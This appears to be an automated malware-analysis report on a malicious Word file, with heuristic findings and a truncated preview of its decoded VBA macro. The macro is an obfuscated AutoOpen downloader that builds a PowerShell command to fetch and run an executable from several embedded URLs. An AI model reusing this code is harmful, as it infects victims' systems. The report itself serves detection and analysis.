MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function to execute a command, which is a common technique for downloading and executing further malicious payloads. The presence of the Shell() call and the AutoOpen macro strongly suggests an intent to compromise the user's system.
Heuristics 6
-
ClamAV: Doc.Malware.Generic-6681834-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6681834-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4708 bytes |
SHA-256: f9c1f6132345ef71ca3f8b21fe35cf70e261feaf6c23876c2803d83bd13241bf |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "BEvloVO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Set sjjvvP = CpBTQm
Set ivURV = QIikbV
Set OAwRj = wJQzvS
Set dFMOvc = zmRGRN
Set kLiCa = DDsRf
Shell iEIhFV + tzofhkzQ + HlJaRhODl + ilEiSEEl + mCztbkMUdYzzO, Format(0)
Set MziiU = tnimU
Set UVaKVb = kSOGzO
End Sub
Attribute VB_Name = "nKhXzYGHaG"
Function iEIhFV()
On _
Error _
Resume _
Next
Set HNLVhb = EfGsSi
Set biluj = WLvYz
Set rhrPj = zBYwFS
aGLWUG = Format(Chr(5 + 12 + 17 + 16 + 49)) + "md /V" + "/" + Format(Chr(3 + 8 + 12 + 10 + 34)) + Format(Chr(1 + 3 + 5 + 5 + 20)) + "^" + "s^et" + " ^" + "G^TK" + "= ^ " + " ^ " + "^ ^ ^" + " ^ ^ ^"
Set sjhjW = paiiJK
tjmbji = " ^ ^ " + " ^" + " " + "^ ^" + "}^}^" + "{^h" + Format(Chr(5 + 12 + 17 + 16 + 49))
Set nCRcBt = QMzDzn
Set wQjjF = RiiEB
Set bFiPzk = RiTnB
Set RwfGB = WluTW
jVnKuZ = "t^a" + Format(Chr(5 + 12 + 17 + 16 + 49)) + "^" + "}^;^k" + "^a^er^" + "b^;^H^" + "ij^$ " + "^me^t" + "I^"
Set LLtZzP = RqlIJ
nnUXB = "-e^" + "k^o" + "vn" + "I" + "^;)^H" + "i^" + "j$^ ^" + ",z^MP" + "^$(^e" + "l^i^" + "F"
Set avwMlC = nRFEha
Set bINPDm = knThWU
Set AMRZA = KXnZCh
iLAZwwWmB = "^d^aoln" + "wo^D" + "^" + ".p" + Format(Chr(3 + 8 + 12 + 10 + 34)) + "^a^" + "${" + "^" + "yr^t" + "{)^zP"
Set tuiSk = rhEIRl
Set AEEmMX = JjjcNv
ZCqDNwkY = "b^" + "$ n" + "^i^ zM^" + "P$(^" + "h" + Format(Chr(5 + 12 + 17 + 16 + 49)) + "a^" + "er^o^f;" + "^" + "'^e^x" + "e^.^'"
Set LupXAf = luNUD
Set NEQWf = CHNfE
Set ckKNa = zdotj
kNAWhtWhJj = "^" + "+^" + "i^W^W$" + "^" + "+" + "'\'+" + Format(Chr(5 + 12 + 17 + 16 + 49)) + "^"
Set wZjTW = GwRzU
QilXQ = "ilb^up^" + ":vn" + "e$^=^H" + "^" + "ij^$^;'"
iEIhFV = aGLWUG + tjmbji + jVnKuZ + nnUXB + iLAZwwWmB + ZCqDNwkY + kNAWhtWhJj + QilXQ
Set YfXrw = DnOOv
Set jBuTiY = boFvXI
Set ZKhpwz = RpfYC
Set XqKPMz = PNQKhE
End Function
Function tzofhkzQ()
On _
Error _
Resume _
Next
Set acToLG = jADim
Set iOsLt = zBLaM
Set vAQCB = LVrCjU
RVZPMwc = "1^" + "6" + "4^'^ ^" + "=" + "^ ^i^"
Set IELIYt = iUGdl
Set LLrwiZ = smBMh
unsXFlmfN = "W" + "^W$" + ";)" + "^'@" + "'(t^" + "i^lpS^" + "." + "'" + "r" + "V" + "^3^o" + "6S^Q/^"
Set vrjDR = rObSE
Set UPOJc = wVLXqW
Set hiVavo = qpjcUP
SnwhSljdNiR = "lp^.o" + "fn^i^." + "l" + "e" + "i" + "prak" + "//^"
Set TtHrcC = QsZsW
Set ZrDbtF = rGQLU
Set ihITh = QjJSf
iAVnvbiP = ":^p" + "^t^t^h" + "@I/" + "^ur." + "^an" + "nav-" + "a^h^or^"
Set JmIPw = UMvsa
Set XjwwFw = uWJow
Set kQszW = kuKlf
Set tikwv = wwzZj
JfLiipiLYD = "k//" + ":p^t" + "^th@^7" + "/^p^ohs" + ".^y"
Set cTTWYb = KBRCY
Set ElrIfC = wmvoK
Set zpKOU = PzDTms
fqFPRQVdo = "^" + "sr^" + "uk//^:p" + "^tth@^J" + "a^W/et" + "^is" + "^." + "^str" + "^i^h" + "^s" + Format(Chr(5 + 12 + 17 + 16 + 49)) + "ora" + "m"
tzofhkzQ = RVZPMwc + unsXFlmfN + SnwhSljdNiR + iAVnvbiP + JfLiipiLYD + fqFPRQVdo
Set motLvb = nBCBci
Set BQlPr = UdhGE
Set iYWmc = VScSm
End Function
Function HlJaRhODl()
On _
Error _
Resume _
Next
Set KuHMc = CTjrKL
Set zjPudE = ulacF
Set lQTwDc = vPvuPt
Set zhwmfk = KdzRj
Yzjpm = "/" + "/:^pt" + "t^h@^" + "z" + "^2/^mo" + Format(Chr(5 + 12 + 17 + 16 + 49)) + "." + "^d^a^m" + "^a" + "^ho^" + "mn^a" + "^mel^" + "bo^m//"
Set AmwHaF = nCQiw
Set FcUlbL = iXCQSP
shrHEVOz = ":^pt^t" + "h'=z^Pb" + "$^;tnei" + "^l" + Format(Chr(3 + 8 + 12 + 10 + 34)) + "^be" + "W^.te"
Set WcwdiE = DYpwt
Set vIWvjw = UnutR
VAEsUO = "N t" + Format(Chr(5 + 12 + 17 + 16 + 49)) + "ejbo" + "^-^" + "w" + "en^=^p" + Format(Chr(3 + 8 + 12 + 10 + 34)) + "^a" + "^$^" + " ^ll^" + "eh^sr^" + "e^w" + "o^p&&^"
Set oCjQp = MPAFn
Set pJTjjj = HBjqvV
Set IpsGSt = zCPAP
Set MVQXqr = wTzKv
Set lNCWt = IvTbi
zAYjWk = "f^or /" + "^" + "L %^E
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.